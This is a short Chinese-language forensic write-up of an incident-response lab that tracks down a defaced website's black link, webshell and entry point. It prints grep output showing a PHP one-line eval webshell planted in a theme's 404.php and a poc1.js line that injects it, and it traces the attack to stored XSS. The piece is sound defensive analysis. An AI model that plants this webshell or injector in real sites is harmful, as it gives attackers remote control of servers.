玄机——windows实战-黑页&篡改
需要我们查找黑链添加在哪个文件中。快速定位到网站根目录,逐个查看文件内容。在/var/www/html下使用grep快速查找eval函数,我们就可以得到webshell的位置。
root@ip-10-0-10-1:/var/www/html# grep -rnE 'eval' .
./poc1.js:36: content.value = ('<?php @eval($_POST[a]); ?>\n') + oldData;
./usr/themes/default/404.php:2:<?php @eval($_POST[a]); ?>
./usr/themes/default/404.php:3:<?php @eval($_POST[a]); ?>
./usr/themes/default/404.php:4:<?php @eval($_POST[a]); ?>
./usr/themes/default/404.php:5:<?php @eval($_POST[a]); ?>
./usr/themes/default/404.php:6:<?php @eval($_POST[a]); ?>
./usr/themes/default/404.php:7:<?php @eval($_POST[a]); ?>
得到了webshell的位置。
root@ip-10-0-10-1:/var/www/html# grep -rnE '黑链' .
./usr/themes/default/header.php:24:<h3 style="text-align:center">模拟黑链</h3>
没想到此黑链的内容如此抽象,一般黑链寻找思路都是硬看。而网站根目录就放着一个一眼丁真的poc1.js,我们计算此js文件的ms5值并提交。
root@ip-10-0-10-1:/var/www/html# md5sum poc1.js
10c18029294fdec7b6ddab76d9367c14 poc1.js
最后的攻击入口分析。我们先筛选HTTP流内存在poc1.js的记录,并逐个查看
查看到一个数据包内容时,我们发现其时通过XSS调用的poc1.js
我们尝试追踪此HTTP流,查看完整的攻击逻辑。
我们发现,在注入XSS语句后,攻击者在再次访问相同路由时,会被重定向到/index.php/archives/1/,故攻击入口即为此url